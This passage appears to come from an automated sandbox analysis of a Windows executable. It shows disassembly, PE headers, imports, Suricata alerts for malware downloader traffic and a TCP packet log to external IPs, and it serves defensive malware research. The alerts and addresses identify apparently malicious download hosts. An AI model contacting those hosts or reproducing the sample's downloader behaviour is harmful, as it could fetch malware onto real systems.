                                                                                    mov dword ptr [007A2700h], eax
                                                                                    mov eax, ebp
                                                                                    jne 00007F66E8A52DDCh
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 007A8001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007F66E8A5528Dh
                                                                                    push eax
                                                                                    call dword ptr [00407220h]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007F66E8A52E95h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007F66E8A52DD8h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007F66E8A52DCCh

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c00000xdbd8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x99ae80x12e8.data
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5bc80x5c000dfea16d5f7d29b49617c6d476811b8fFalse0.6820652173913043data6.509979623096964IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x11ce0x12006c31e0693072284f258d2c4a271de506False0.4524739583333333OpenPGP Secret Key5.236327486414569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x3997f80x4003e7188ab31a597163972f006b0a1b0b0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x3a30000x1d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x3c00000xdbd80xdc00a72c7056af1a0fa33cb886ea0b058fbbFalse0.09834872159090909data3.8171742903256005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x3c01d80xd228Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/mEnglishUnited States0.07864312267657993
                                                                                    RT_DIALOG0x3cd4000x100dataEnglishUnited States0.5234375
                                                                                    RT_DIALOG0x3cd5000xf8dataEnglishUnited States0.6330645161290323
                                                                                    RT_DIALOG0x3cd5f80x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x3cd6580x14dataEnglishUnited States1.15
                                                                                    RT_VERSION0x3cd6700x25cdataEnglishUnited States0.5165562913907285
                                                                                    RT_MANIFEST0x3cd8d00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllSleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar
                                                                                    USER32.dllCreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                                                    ADVAPI32.dllRegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                    ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                    VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-09-24T16:31:07.421987+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.304980964.188.18.7580TCP
                                                                                    2024-09-24T16:31:10.828763+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:13.562087+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:14.013711+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049812172.67.177.134443TCP
                                                                                    2024-09-24T16:31:14.296332+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:14.742507+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049813172.67.177.134443TCP
                                                                                    2024-09-24T16:31:16.061568+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:16.515085+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049814172.67.177.134443TCP
                                                                                    2024-09-24T16:31:16.795757+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:17.255560+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049815172.67.177.134443TCP
                                                                                    2024-09-24T16:31:17.592467+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:18.066005+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049816172.67.177.134443TCP
                                                                                    2024-09-24T16:31:18.951543+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:19.413571+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049817172.67.177.134443TCP
                                                                                    2024-09-24T16:31:19.717044+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:20.165549+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049818172.67.177.134443TCP
                                                                                    2024-09-24T16:31:20.466845+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.11.3049810158.101.44.24280TCP
                                                                                    2024-09-24T16:31:20.928000+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.11.3049819172.67.177.134443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Sep 24, 2024 16:31:07.203886032 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.312484026 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.312783003 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.313019991 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.421670914 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.421696901 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.421722889 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.421845913 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.421987057 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.422158957 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.530607939 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530622959 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530635118 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530702114 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530714035 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530725002 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530808926 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530834913 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.530927896 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.530927896 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.531095028 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.639326096 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639424086 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639437914 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639543056 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.639553070 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639579058 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639591932 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639626026 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639637947 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639734983 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.639751911 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639784098 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639796972 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639823914 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.639919996 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.639919996 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.639933109 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.640033960 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.640059948 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.640059948 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.640059948 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.640073061 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.640248060 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.640418053 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748151064 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748164892 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748200893 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748428106 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748440981 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748452902 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748485088 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748492002 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748503923 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748529911 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748542070 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748553038 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748572111 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748584032 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748647928 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748647928 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748672962 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748697042 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748709917 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748720884 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748732090 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748784065 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748826027 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748852015 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748891115 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748917103 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748929024 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.748977900 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.748977900 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.749043941 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749069929 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749093056 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749104977 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749115944 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749126911 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749161005 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.749162912 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749196053 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749208927 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.749494076 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.749494076 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.857245922 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857271910 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857291937 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857310057 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857331038 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857350111 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857368946 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857387066 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857405901 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857424974 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857444048 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857461929 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857481003 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857498884 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857517958 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857567072 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.857655048 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857680082 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857700109 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857753992 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857774019 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857814074 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857832909 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857851982 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857871056 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857891083 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.857908964 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858079910 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858081102 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858138084 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858190060 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858225107 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858262062 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858280897 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858319998 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858340025 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858417988 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858421087 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858442068 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858465910 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858494043 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858517885 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858553886 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858576059 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858597994 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858597040 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858619928 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858639956 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858660936 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858683109 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858704090 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858726025 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858747005 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858767033 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858768940 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858767033 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858791113 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858813047 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858844042 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858865976 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858886957 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858908892 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858918905 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.858931065 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858952999 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858974934 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858997107 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.859086990 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.859252930 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966357946 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966468096 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966547966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966609955 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966670990 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966732979 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966758013 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966758013 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966794014 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966855049 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966917038 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966927052 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966976881 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967037916 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967093945 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967097998 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967159986 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967221975 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967267990 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967268944 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967268944 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967283964 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967345953 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967406988 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967432976 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967468977 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967530966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967592001 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967605114 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967606068 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967652082 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967714071 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967773914 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967818022 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967818975 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967842102 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967926025 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967989922 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968051910 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968105078 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968112946 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968195915 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968276978 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968277931 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968286991 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968346119 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968401909 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968451023 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968451023 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968457937 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968513966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968569040 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968612909 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968612909 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968624115 CEST804980964.188.18.75192.168.11.30
